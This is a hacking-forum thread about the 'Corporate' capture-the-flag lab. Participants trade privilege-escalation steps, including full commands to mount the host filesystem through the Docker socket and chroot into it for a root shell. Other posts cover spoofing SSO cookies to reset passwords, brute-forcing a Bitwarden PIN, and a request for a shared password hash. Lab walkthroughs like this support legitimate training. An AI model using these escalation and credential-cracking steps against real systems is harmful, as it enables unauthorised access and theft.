Posts: 14
Threads: 0
Joined: Aug 2023
(Dec 31, 2023, 05:39 PM)PK6CfvT8 Wrote: (Dec 22, 2023, 05:04 PM)magway Wrote: i got root on workstation and there is no fucking flag..
root@corporate-workstation-04:~# ls -al
total 36
drwx------ 6 root root 4096 Dec 22 16:55 .
drwxr-xr-x 19 root root 4096 Nov 27 21:57 ..
lrwxrwxrwx 1 root root 9 Nov 28 15:28 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 3 root root 4096 Dec 22 16:55 .gnupg
-rw------- 1 root root 20 Nov 7 14:34 .lesshst
drwxr-xr-x 3 root root 4096 Apr 12 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 3 root root 4096 Apr 12 2023 snap
drwx------ 2 root root 4096 Apr 12 2023 .ssh
-rw-r--r-- 1 root root 0 Apr 12 2023 .sudo_as_admin_successful
How did you move from elwin.jones to root?
In case someone comes to this:
- the next trick is searching for the docker socket
- find / -name docker.sock 2>/dev/null
- ls -la /run/docker.sock
- it is in group 'engineer'
- find a user in that group / reset the password via sso (cookie spoofing) and login to the ssh
- privsec to root using docker (which I have to still figure out)
Posts: 2
Threads: 0
Joined: Sep 2023
(Jan 03, 2024, 08:44 AM)PK6CfvT8 Wrote: (Dec 31, 2023, 05:39 PM)PK6CfvT8 Wrote: (Dec 22, 2023, 05:04 PM)magway Wrote: i got root on workstation and there is no fucking flag..
root@corporate-workstation-04:~# ls -al
total 36
drwx------ 6 root root 4096 Dec 22 16:55 .
drwxr-xr-x 19 root root 4096 Nov 27 21:57 ..
lrwxrwxrwx 1 root root 9 Nov 28 15:28 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 3 root root 4096 Dec 22 16:55 .gnupg
-rw------- 1 root root 20 Nov 7 14:34 .lesshst
drwxr-xr-x 3 root root 4096 Apr 12 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 3 root root 4096 Apr 12 2023 snap
drwx------ 2 root root 4096 Apr 12 2023 .ssh
-rw-r--r-- 1 root root 0 Apr 12 2023 .sudo_as_admin_successful
How did you move from elwin.jones to root?
In case someone comes to this:
- the next trick is searching for the docker socket
- find / -name docker.sock 2>/dev/null
- ls -la /run/docker.sock
- it is in group 'engineer'
- find a user in that group / reset the password via sso (cookie spoofing) and login to the ssh
- privsec to root using docker (which I have to still figure out)
From there you can download a docker image such as alpine, import it and mount the host filesystem in the container:
# download alpine locally
wget https://github.com/alpinelinux/docker-alpine/raw/97c57449282d97cfa1c0b64669aed9afbf08645a/x86_64/alpine-minirootfs-3.19.0-x86_64.tar.gz
# transfer it into the workstation
scp alpine-minirootfs-3.19.0-x86_64.tar.gz ward.pfannerstill@10.9.0.4:/tmp
# import the image
cat /tmp/alpine-minirootfs-3.19.0-x86_64.tar.gz | docker import - alpine
# mount the host filesystem in the container
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Posts: 57
Threads: 2
Joined: Aug 2023
Hi everybody. What is weblink of proxmox port 8006? Tried:
https://10.9.0.1:8006/
https://[::ffff:a09:1]:8006/
No cookie. PLS help. Thanks advance.
Posts: 14
Threads: 0
Joined: Aug 2023
(Jan 07, 2024, 12:02 AM)monkeythefirst Wrote: Hi everybody. What is weblink of proxmox port 8006? Tried:
https://10.9.0.1:8006/
https://[::ffff:a09:1]:8006/
This worked for me:
https://10.9.0.1:8006
Posts: 56
Threads: 5
Joined: Nov 2023
Jan 08, 2024, 11:42 PM
(This post was last modified: Jan 08, 2024, 11:42 PM by RebeLHeX.)
Hello I finally started to focus on this box yesterday and today I got user.txt and I got with a lot of pain until the GIT part, I was able to clone all 3 repos, I know they patched the ldap so not sure the next steps since most of the post here relate to pre-patch can anyone point me the steps( no solutions just steps ) thanks!
Posts: 1
Threads: 0
Joined: Jan 2024
Jan 09, 2024, 01:50 PM
(This post was last modified: Jan 09, 2024, 01:57 PM by noooudont.)
Do someone has sysadmin hash? If yes, share it please 
Posts: 231
Threads: 18
Joined: Jul 2023
Guys! anyone has problem with ldap? i'm trying to add sudo user but noluck ! i m connecting on ldap.corporate.htb 10.9 in port 636 network!
Posts: 7
Threads: 0
Joined: Nov 2023
(Jan 11, 2024, 01:30 PM)cavour13 Wrote: Guys! anyone has problem with ldap? i'm trying to add sudo user but noluck ! i m connecting on ldap.corporate.htb 10.9 in port 636 network!
Ldap write permissions, has already been patched. You must go the intended path.
Posts: 231
Threads: 18
Joined: Jul 2023
(Jan 11, 2024, 05:04 PM)gazgak001 Wrote: (Jan 11, 2024, 01:30 PM)cavour13 Wrote: Guys! anyone has problem with ldap? i'm trying to add sudo user but noluck ! i m connecting on ldap.corporate.htb 10.9 in port 636 network!
Ldap write permissions, has already been patched. You must go the intended path.
Thanks i knew was patched! Now i m getting error using bruter.. i put XDG_CONFIG_HOME on my Bitwarden/data.json but don't work!
how can i make it work ?
Posts: 148
Threads: 2
Joined: Oct 2023
(Jan 12, 2024, 06:26 PM)cavour13 Wrote: (Jan 11, 2024, 05:04 PM)gazgak001 Wrote: (Jan 11, 2024, 01:30 PM)cavour13 Wrote: Guys! anyone has problem with ldap? i'm trying to add sudo user but noluck ! i m connecting on ldap.corporate.htb 10.9 in port 636 network!
Ldap write permissions, has already been patched. You must go the intended path.
Thanks i knew was patched! Now i m getting error using bruter.. i put XDG_CONFIG_HOME on my Bitwarden/data.json but don't work!
how can i make it work ? Yes, the intended way is going from the bitwarden instead of LDAP privesc way. You need to brute force the pin. You exported the data right from the app? Inspect json stb. Look into a tool called moz-idb-edit that helps extracting the data. Find the kdfiteration from data.json and that's the way you should crack the pin.
Then moving on, you will access the git (remember, it's reachable only via VPN, so adjust hosts file accordingly for this), get the repos and understand the code, analyze...
Also check previous posts in this topic since intended way is also discussed.
|
